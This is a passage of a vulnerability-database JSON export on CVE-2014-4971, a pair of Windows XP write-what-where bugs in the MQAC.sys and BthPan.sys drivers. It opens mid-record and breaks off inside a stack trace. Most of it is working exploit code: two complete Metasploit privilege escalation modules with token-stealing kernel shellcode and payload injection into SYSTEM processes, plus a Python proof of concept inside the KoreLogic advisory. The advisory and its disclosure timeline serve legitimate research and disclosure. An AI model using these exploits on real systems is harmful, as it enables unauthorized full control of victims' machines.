Msf::Post::Windows::Process \n \ndef initialize(info={}) \nsuper(update_info(info, { \n'Name' => 'MQAC.sys Arbitrary Write Privilege Escalation', \n'Description' => %q{ \nA vulnerability within the MQAC.sys module allows an attacker to \noverwrite an arbitrary location in kernel memory. \n \nThis module will elevate itself to SYSTEM, then inject the payload \ninto another SYSTEM process. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Matt Bergin', # original exploit and all the hard work \n'Spencer McIntyre' # MSF module \n], \n'Arch' => [ ARCH_X86 ], \n'Platform' => [ 'win' ], \n'SessionTypes' => [ 'meterpreter' ], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Targets' => \n[ \n[ 'Windows XP SP3', \n{ \n'_KPROCESS' => \"\\x44\", \n'_TOKEN' => \"\\xc8\", \n'_UPID' => \"\\x84\", \n'_APLINKS' => \"\\x88\" \n} \n], \n], \n'References' => \n[ \n[ 'CVE', '2014-4971' ], \n[ 'EDB', '34112' ], \n[ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt' ] \n], \n'DisclosureDate'=> 'Jul 22 2014', \n'DefaultTarget' => 0 \n})) \nend \n \ndef find_sys_base(drvname) \nsession.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi') \nsession.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ [\"PBLOB\", \"lpImageBase\", \"out\"], [\"DWORD\", \"cb\", \"in\"], [\"PDWORD\", \"lpcbNeeded\", \"out\"]]) \nsession.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ [\"LPVOID\", \"ImageBase\", \"in\"], [\"PBLOB\", \"lpBaseName\", \"out\"], [\"DWORD\", \"nSize\", \"in\"]]) \nresults = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4) \naddresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack(\"L*\") \n \naddresses.each do |address| \nresults = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48) \ncurrent_drvname = results['lpBaseName'][0..results['return'] - 1] \nif drvname == nil \nif current_drvname.downcase.include?('krnl') \nreturn [address, current_drvname] \nend \nelsif drvname == results['lpBaseName'][0..results['return'] - 1] \nreturn [address, current_drvname] \nend \nend \nend \n \n# Function borrowed from smart_hashdump \ndef get_system_proc \n# Make sure you got the correct SYSTEM Account Name no matter the OS Language \nlocal_sys = resolve_sid(\"S-1-5-18\") \nsystem_account_name = \"#{local_sys[:domain]}\\\\#{local_sys[:name]}\" \n \nthis_pid = session.sys.process.getpid \n# Processes that can Blue Screen a host if migrated in to \ndangerous_processes = [\"lsass.exe\", \"csrss.exe\", \"smss.exe\"] \nsession.sys.process.processes.each do |p| \n# Check we are not migrating to a process that can BSOD the host \nnext if dangerous_processes.include?(p[\"name\"]) \nnext if p[\"pid\"] == this_pid \nnext if p[\"pid\"] == 4 \nnext if p[\"user\"] != system_account_name \nreturn p \nend \nend \n \ndef open_device \nhandle = session.railgun.kernel32.CreateFileA(\"\\\\\\\\.\\\\MQAC\", \"FILE_SHARE_WRITE|FILE_SHARE_READ\", 0, nil, \"OPEN_EXISTING\", 0, nil) \nif handle['return'] == 0 \nprint_error('Failed to open the \\\\\\\\.\\\\MQAC device') \nreturn nil \nend \nhandle = handle['return'] \nend \n \ndef check \nhandle = open_device \nif handle.nil? \nreturn Exploit::CheckCode::Safe \nend \nsession.railgun.kernel32.CloseHandle(handle) \n \nos = sysinfo[\"OS\"] \ncase os \nwhen /windows xp.*service pack 3/i \nreturn Exploit::CheckCode::Appears \nwhen /windows xp/i \nreturn Exploit::CheckCode::Detected \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \ndef exploit \nif sysinfo[\"Architecture\"] =~ /wow64/i \nprint_error(\"Running against WOW64 is not supported\") \nreturn \nelsif sysinfo[\"Architecture\"] =~ /x64/ \nprint_error(\"Running against 64-bit systems is not supported\") \nreturn \nend \n \nif is_system? \nprint_error(\"This meterpreter session is already running as SYSTEM\") \nreturn \nend \n \nkernel_info = find_sys_base(nil) \nbase_addr = 0xffff \nprint_status(\"Kernel Base Address: 0x#{kernel_info[0].to_s(16)}\") \n \nhandle = open_device \nreturn if handle.nil? \n \nthis_proc = session.sys.process.open \nunless this_proc.memory.writable?(base_addr) \nsession.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack(\"L\"), nil, [ 0xffff ].pack(\"L\"), \"MEM_COMMIT|MEM_RESERVE\", \"PAGE_EXECUTE_READWRITE\") \nend \nunless this_proc.memory.writable?(base_addr) \nprint_error('Failed to properly allocate memory') \nthis_proc.close \nreturn \nend \n \nhKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1) \nhKernel = hKernel['return'] \nhalDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, \"HalDispatchTable\") \nhalDispatchTable = halDispatchTable['return'] \nhalDispatchTable -= hKernel \nhalDispatchTable += kernel_info[0] \nprint_status(\"HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}\") \n \ntokenstealing = \"\\x52\" # push edx # Save edx on the stack \ntokenstealing << \"\\x53\" # push ebx # Save ebx on the stack \ntokenstealing << \"\\x33\\xc0\" # xor eax, eax # eax = 0 \ntokenstealing << \"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD \ntokenstealing << \"\\x8b\\x40\" + target['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS \ntokenstealing << \"\\x8b\\xc8\" # mov ecx, eax \ntokenstealing << \"\\x8b\\x98\" + target['_TOKEN'] + \"\\x00\\x00\\x00\" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN \ntokenstealing << \"\\x8b\\x80\" + target['_APLINKS'] + \"\\x00\\x00\\x00\" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks \ntokenstealing << \"\\x81\\xe8\" + target['_APLINKS'] + \"\\x00\\x00\\x00\" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks \ntokenstealing << \"\\x81\\xb8\" + target['_UPID'] + \"\\x00\\x00\\x00\\x04\\x00\\x00\\x00\" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP) \ntokenstealing << \"\\x75\\xe8\" # jne 0000101e ====================== \ntokenstealing << \"\\x8b\\x90\" + target['_TOKEN'] + \"\\x00\\x00\\x00\" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX \ntokenstealing << \"\\x8b\\xc1\" # mov eax, ecx # Retrieves KPROCESS stored on ECX \ntokenstealing << \"\\x89\\x90\" + target['_TOKEN'] + \"\\x00\\x00\\x00\" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS \ntokenstealing << \"\\x5b\" # pop ebx # Restores ebx \ntokenstealing << \"\\x5a\" # pop edx # Restores edx \ntokenstealing << \"\\xc2\\x10\" # ret 10h # Away from the kernel! \n \nshellcode = make_nops(0x200) + tokenstealing \nthis_proc.memory.write(0x1, shellcode) \nthis_proc.close \n \nprint_status(\"Triggering vulnerable IOCTL\") \nsession.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0) \nresult = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4) \n \nunless is_system? \nprint_error(\"Exploit failed\") \nreturn \nend \n \nproc = get_system_proc \nprint_status(\"Injecting the payload into SYSTEM process: #{proc['name']}\") \nunless execute_shellcode(payload.encoded, nil, proc['pid']) \nfail_with(Failure::Unknown, \"Error while executing the payload\") \nend \nend \n \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/127618/mqac_write.rb.txt"}, {"lastseen": "2016-12-05T22:19:55", "description": "", "published": "2014-10-15T00:00:00", "type": "packetstorm", "title": "Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-10-15T00:00:00", "id": "PACKETSTORM:128674", "href": "https://packetstormsecurity.com/files/128674/Microsoft-Bluetooth-Personal-Area-Networking-BthPan.sys-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \nrequire 'msf/core/exploit/local/windows_kernel' \nrequire 'rex' \n \nclass Metasploit3 < Msf::Exploit::Local \nRank = AverageRanking \n \ninclude Msf::Exploit::Local::WindowsKernel \ninclude Msf::Post::File \ninclude Msf::Post::Windows::FileInfo \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::Process \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation', \n'Description' => %q{ \nA vulnerability within Microsoft Bluetooth Personal Area Networking module, \nBthPan.sys, can allow an attacker to inject memory controlled by the attacker \ninto an arbitrary location. This can be used by an attacker to overwrite \nHalDispatchTable+0x4 and execute arbitrary code by subsequently calling \nNtQueryIntervalProfile. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC \n'Jay Smith <jsmith[at]korelogic.com>' # MSF module \n], \n'Arch' => ARCH_X86, \n'Platform' => 'win', \n'SessionTypes' => [ 'meterpreter' ], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread' \n}, \n'Targets' => \n[ \n['Windows XP SP3', \n{ \n'HaliQuerySystemInfo' => 0x16bba, \n'_KPROCESS' => \"\\x44\", \n'_TOKEN' => \"\\xc8\", \n'_UPID' => \"\\x84\", \n'_APLINKS' => \"\\x88\" \n} \n] \n], \n'References' => \n[ \n[ 'CVE', '2014-4971' ], \n[ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ], \n[ 'OSVDB', '109387' ] \n], \n'DisclosureDate' => 'Jul 18 2014', \n'DefaultTarget' => 0 \n)) \nend \n \n \ndef ring0_shellcode \ntokenswap = \"\\x60\\x64\\xA1\\x24\\x01\\x00\\x00\" \ntokenswap << \"\\x8B\\x40\\x44\\x50\\xBB\\x04\" \ntokenswap << \"\\x00\\x00\\x00\\x8B\\x80\\x88\" \ntokenswap << \"\\x00\\x00\\x00\\x2D\\x88\" \ntokenswap << \"\\x00\\x00\\x00\\x39\\x98\\x84\" \ntokenswap << \"\\x00\\x00\\x00\\x75\\xED\\x8B\\xB8\\xC8\" \ntokenswap << \"\\x00\\x00\\x00\\x83\\xE7\\xF8\\x58\\xBB\" \ntokenswap << [session.sys.process.getpid].pack('V') \ntokenswap << \"\\x8B\\x80\\x88\\x00\\x00\\x00\" \ntokenswap << \"\\x2D\\x88\\x00\\x00\\x00\" \ntokenswap << \"\\x39\\x98\\x84\\x00\\x00\\x00\" \ntokenswap << \"\\x75\\xED\\x89\\xB8\\xC8\" \ntokenswap << \"\\x00\\x00\\x00\\x61\\xC3\" \nend \n \ndef fill_memory(proc, address, length, content) \nsession.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), \"MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN\", \"PAGE_EXECUTE_READWRITE\") \n \nunless proc.memory.writable?(address) \nvprint_error(\"Failed to allocate memory\") \nreturn nil \nend \nvprint_good(\"#{address} is now writable\") \n \nresult = proc.memory.write(address, content) \n \nif result.nil? \nvprint_error(\"Failed to write contents to memory\") \nreturn nil \nend \nvprint_good(\"Contents successfully written to 0x#{address.to_s(16)}\") \n \nreturn address \nend \n \ndef disclose_addresses(t) \naddresses = {} \n \nhal_dispatch_table = find_haldispatchtable \nreturn nil if hal_dispatch_table.nil? \naddresses['halDispatchTable'] = hal_dispatch_table \nvprint_good(\"HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}\") \n \nvprint_status('Getting the hal.dll base address...') \nhal_info = find_sys_base('hal.dll') \nif hal_info.nil? \nvprint_error('Failed to disclose hal.dll base address') \nreturn nil \nend \nhal_base = hal_info[0] \nvprint_good(\"hal.dll base address disclosed at 0x#{hal_base.to_s(16)}\") \n \nhali_query_system_information = hal_base + t['HaliQuerySystemInfo'] \naddresses['HaliQuerySystemInfo'] = hali_query_system_information \n \nvprint_good(\"HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}\") \naddresses \nend \n \ndef check \nif sysinfo[\"Architecture\"] =~ /wow64/i || sysinfo[\"Architecture\"] =~ /x64/ \nreturn Exploit::CheckCode::Safe \nend \n \nos = sysinfo[\"OS\"] \nreturn Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i \n \nhandle = open_device(\"\\\\\\\\.\\\\bthpan\", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') \nreturn Exploit::CheckCode::Safe unless handle \n \nsession.railgun.kernel32.CloseHandle(handle) \n \nreturn Exploit::CheckCode::Vulnerable \nend \n \ndef exploit \nif is_system? \nfail_with(Exploit::Failure::None, 'Session is already elevated') \nend \n \nunless check == Exploit::CheckCode::Vulnerable \nfail_with(Exploit::Failure::NotVulnerable, \"Exploit not available on this system\") \nend \n \nhandle = open_device(\"\\\\\\\\.\\\\bthpan\", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING') \nif handle.nil? \nfail_with(Failure::NoTarget, \"Unable to open \\\\\\\\.\\\\bthpan device\") \nend \n \nmy_target = targets[0] \nprint_status(\"Disclosing the HalDispatchTable address...\") \n@addresses = disclose_addresses(my_target) \nif @addresses.nil? \nsession.railgun.kernel32.CloseHandle(handle) \nfail_with(Failure::Unknown, \"Failed to disclose necessary address for exploitation. Aborting.\") \nelse \nprint_good(\"Address successfully disclosed.\") \nend \n \nprint_status(\"Storing the shellcode in memory...\") \nthis_proc = session.sys.process.open \nkernel_shell = ring0_shellcode \nkernel_shell_address = 0x1 \n \nbuf = \"\\x90\" * 0x6000 \nbuf[0, 1028] = \"\\x50\\x00\\x00\\x00\" + \"\\x90\" * 0x400 \nbuf[0x5000, kernel_shell.length] = kernel_shell \n \nresult = fill_memory(this_proc, kernel_shell_address, buf.length, buf) \nif result.nil? \nsession.railgun.kernel32.CloseHandle(handle) \nfail_with(Failure::Unknown, \"Error while storing the kernel stager shellcode on memory\") \nend \nprint_good(\"Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}\") \n \nprint_status(\"Triggering the vulnerability, corrupting the HalDispatchTable...\") \nsession.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses[\"halDispatchTable\"] + 0x4, 0) \nsession.railgun.kernel32.CloseHandle(handle) \n \nprint_status(\"Executing the Kernel Stager throw NtQueryIntervalProfile()...\") \nsession.railgun.ntdll.NtQueryIntervalProfile(2, 4) \n \nprint_status(\"Checking privileges after exploitation...\") \n \nunless is_system? \nfail_with(Failure::Unknown, \"The privilege escalation wasn't successful\") \nend \nprint_good(\"Privilege escalation successful!\") \n \np = payload.encoded \nprint_status(\"Injecting #{p.length} bytes to memory and executing it...\") \nunless execute_shellcode(p) \nfail_with(Failure::Unknown, \"Error while executing the payload\") \nend \nend \nend \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128674/bthpan.rb.txt"}, {"lastseen": "2016-12-05T22:14:08", "description": "", "published": "2014-07-21T00:00:00", "type": "packetstorm", "title": "Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4971"], "modified": "2014-07-21T00:00:00", "id": "PACKETSTORM:127535", "href": "https://packetstormsecurity.com/files/127535/Microsoft-XP-SP3-BthPan.sys-Arbitrary-Write-Privilege-Escalation.html", "sourceData": "`Title: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation \nAdvisory ID: KL-001-2014-002 \nPublication Date: 2014-07-18 \nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt \n \n \n1. Vulnerability Details \n \nAffected Vendor: Microsoft \nAffected Product: Bluetooth Personal Area Networking \nAffected Versions: 5.1.2600.5512 \nPlatform: Microsoft Windows XP SP3 \nCWE Classification: CWE-123: Write-what-where Condition \nImpact: Privilege Escalation \nAttack vector: IOCTL \nCVE ID: CVE-2014-4971 \n \n2. Vulnerability Description \n \nA vulnerability within the BthPan module allows an attacker to \ninject memory they control into an arbitrary location they \ndefine. This can be used by an attacker to overwrite \nHalDispatchTable+0x4 and execute arbitrary code by subsequently \ncalling NtQueryIntervalProfile. \n \n3. Technical Description \n \nA userland process can create a handle into the BthPan device \nand subsequently make DeviceIoControlFile() calls into that \ndevice. During the IRP handler routine for 0x0012b814 the user \nprovided OutputBuffer address is not validated. This allows an \nattacker to specify an arbitrary address and write \n(or overwrite) the memory residing at the specified address. \nThis is classicaly known as a write-what-where vulnerability and \nhas well known exploitation methods associated with it. \n \nA stack trace from our fuzzing can be seen below. In our fuzzing \ntestcase, the specified OutputBuffer in the DeviceIoControlFile() \ncall is 0xffff0000. \n \nSTACK_TEXT: \nb1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b \nb1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7 \nb1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc \nb1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92 \nb1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3 \nb1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8 \nb1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25 \nb1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b \nb1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21 \nb1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b \nb1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8 \nb1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93 \nb1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48 \nb1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c \nb1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31 \nb1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70 \nb1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7 \nb1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a \nWARNING: Stack unwind information not available. Following frames may be wrong. \n \nReviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v' \ncommand shows the fault originating in the bthpan driver. \n \nFOLLOWUP_IP: \nbthpan!BthpanReqAdd+16b \nb272b5a1 ebc2 jmp bthpan!BthpanReqAdd+0x12f (b272b565) \n \nReviewing the TRAP_FRAME at the time of crash we can see \nIopCompleteRequest() copying data from InputBuffer into the \nOutputBuffer. InputBuffer is another parameter provided to the \nDeviceIoControlFile() function and is therefore controllable by \nthe attacker. The edi register contains the invalid address \nprovided during the fuzz testcase. \n \nTRAP_FRAME: b1e06630 -- (.trap 0xffffffffb1e06630) \nErrCode = 00000002 \neax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000 \neip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0 nv up ei pl nz na po cy \ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010203 \nnt!IopCompleteRequest+0x92: \n804f3b76 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] \n \nA write-what-where vulnerability can be leveraged to obtain \nescalated privileges. To do so, an attacker will need to \nallocate memory in userland that is populated with shellcode \ndesigned to find the Token for PID 4 (System) and then overwrite \nthe token for its own process. By leveraging the vulnerability \nin BthPan it is then possible to overwrite the pointer at \nHalDispatchTable+0x4 with a pointer to our shellcode. Calling \nNtQueryIntervalProfile() will subsequently call \nHalDispatchTable+0x4, execute our shellcode, and elevate the \nprivilege of the exploit process. \n \n4. Mitigation and Remediation Recommendation \n \nNone. A patch is not likely to be forthcoming from the vendor. \n \n5. Credit \n \nThis vulnerability was discovered by Matt Bergin of KoreLogic \nSecurity, Inc. \n \n6. Disclosure Timeline \n \n2014.04.28 - Initial contact; sent Microsoft report and PoC. \n2014.04.28 - Microsoft acknowledges receipt of vulnerability \nreport; states XP is no longer supported and asks if \nthe vulnerability affects other versions of Windows. \n2014.04.29 - KoreLogic asks Microsoft for clarification of their \nsupport policy for XP. \n2014.04.29 - Microsoft says XP-only vulnerabilities will not be \naddressed with patches. \n2014.04.29 - KoreLogic asks if Microsoft intends to address the \nvulnerability report. \n2014.04.29 - Microsoft opens case to investigate the impact of the \nvulnerability on non-XP systems. \n2014.05.06 - Microsoft asks again if this vulnerability affects \nnon-XP systems. \n2014.05.14 - KoreLogic informs Microsoft that the vulnerability \nreport is for XP and other Windows versions have not \nbeen examined. \n2014.06.11 - KoreLogic informs Microsoft that 30 business days have \npassed since vendor acknowledgement of the initial \nreport. KoreLogic requests CVE number for the \nvulnerability, if there is one. KoreLogic also \nrequests vendor's public identifier for the \nvulnerability along with the expected disclosure date. \n2014.06.11 - Microsoft informs KoreLogic that the vulnerability \ndoes not impact any \"up-platform\" products. Says they \nare investigating embedded platforms. Does not provide \nCVE number. \n2014.06.24 - Microsoft contacts KoreLogic to say that they confused \nthe report of this vulnerability with another and that \nthey cannot reproduce the described behavior. \nMicrosoft asks for an updated Proof-of-Concept, crash \ndumps or any further analysis of the vulnerability \nthat KoreLogic can provide. \n2014.06.25 - KoreLogic provides Microsoft with an updated \nProof-of-Concept which demonstrates using the \nvulnerability to spawn a system shell. \n2014.06.30 - KoreLogic asks Microsoft for confirmation of their \nreceipt of the updated PoC. Also requests that a CVE \nID be issued for this vulnerability. \n2014.07.02 - 45 business days have elapsed since Microsoft \nacknowledged receipt of the vulnerability report and \nPoC. \n2014.07.07 - KoreLogic requests CVE from MITRE. \n2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be \nidentical to KL-001-2014-003 and issues CVE-2014-4971 \nfor both vulnerabilities. \n2014.07.18 - Public disclosure. \n \n7. Proof of Concept \n \n#!/usr/bin/python2 \n# \n# KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation \n# Matt Bergin (KoreLogic / Smash the Stack) \n# CVE-2014-4971 \n# \nfrom ctypes import * \nfrom struct import pack \nfrom os import getpid,system \nfrom sys import exit \nEnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA \nGetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle \nINVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0 \n \n# thanks to offsec for the concept \n# I re-wrote the code as to not fully insult them :) \ndef getBase(name=None): \nretArray = c_ulong*1024 \nImageBase = retArray() \ncallback = c_int(1024) \ncbNeeded = c_long() \nEnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded)) \nfor base in ImageBase: \ndriverName = c_char_p(\"\\x00\"*1024) \nGetDeviceDriverBaseNameA(base,driverName,48) \nif (name): \nif (driverName.value.lower() == name): \nreturn base \nelse: \nreturn (base,driverName.value) \nreturn None \n \nhandle = CreateFileA(\"\\\\\\\\.\\\\BthPan\",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None) \nif (handle == INVALID_HANDLE_VALUE): \nprint \"[!] Could not open handle to BthPan\" \nexit(1) \nNtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40) \nbuf = \"\\xcc\\xcc\\xcc\\xcc\"+\"\\x90\"*0x400 \nWriteProcessMemory(-1, 0x1, \"\\x90\"*0x6000, 0x6000, byref(c_int(0))) \nWriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0))) \nkBase,kVer = getBase() \nhKernel = LoadLibraryExA(kVer,0,1) \nHalDispatchTable = GetProcAddress(hKernel,\"HalDispatchTable\") \nHalDispatchTable -= hKernel \nHalDispatchTable += kBase \nHalDispatchTable += 0x4 \nDeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0) \nCloseHandle(handle) \nNtQueryIntervalProfile(c_ulong(2),byref(c_ulong())) \nexit(0) \n \nThe contents of this advisory are copyright(c) 2014 KoreLogic, Inc. \nand are licensed under a Creative Commons Attribution Share-Alike 4.0 \n(United States) License: \nhttp://creativecommons.org/licenses/by-sa/4.0/ \n \nKoreLogic, Inc. is a founder-owned and operated company with a proven \ntrack record of providing security services to entities ranging from \nFortune 500 to small and mid-sized companies. We are a highly skilled \nteam of senior security consultants doing by-hand security assessments \nfor the most important networks in the U.S. and around the world. We \nare also developers of various tools and resources aimed at helping \nthe security community. \nhttps://www.korelogic.com/about-korelogic.html \n \nOur public vulnerability disclosure policy is available at: \nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/127535/KL-001-2014-002.txt"}], "korelogic": [{"lastseen": "2020-06-11T21:22:38", "bulletinFamily": "software", "cvelist": ["CVE-2014-4971"], "edition": 2, "description": "Title: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation\nAdvisory ID: KL-001-2014-002\nPublication Date: 2014-07-18\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt\n\n\n1. Vulnerability Details\n\n Affected Vendor: Microsoft\n Affected Product: Bluetooth Personal Area Networking\n Affected Versions: 5.1.2600.5512\n Platform: Microsoft Windows XP SP3\n CWE Classification: CWE-123: Write-what-where Condition\n Impact: Privilege Escalation\n Attack vector: IOCTL\n CVE ID: CVE-2014-4971\n\n2. Vulnerability Description\n\n A vulnerability within the BthPan module allows an attacker to\n inject memory they control into an arbitrary location they\n define. This can be used by an attacker to overwrite\n HalDispatchTable+0x4 and execute arbitrary code by subsequently\n calling NtQueryIntervalProfile.\n\n3. Technical Description\n\n A userland process can create a handle into the BthPan device\n and subsequently make DeviceIoControlFile() calls into that\n device. During the IRP handler routine for 0x0012b814 the user\n provided OutputBuffer address is not validated. This allows an\n attacker to specify an arbitrary address and write\n (or overwrite) the memory residing at the specified address.\n This is classicaly known as a write-what-where vulnerability and\n has well known exploitation methods associated with it.\n\n A stack trace from our fuzzing can be seen below. In our fuzzing\n testcase, the specified OutputBuffer in the DeviceIoControlFile()\n call is 0xffff0000.\n\nSTACK_TEXT:\nb1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b\nb1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7\nb1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc\nb1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92\nb1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3\nb1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8\nb1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25\nb1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b\nb1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21\nb1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b\nb1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8\nb1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93\nb1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48\nb1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c\nb1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31\nb1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70\nb1e06b80 8056e57c 000006a8 00000000 00000000 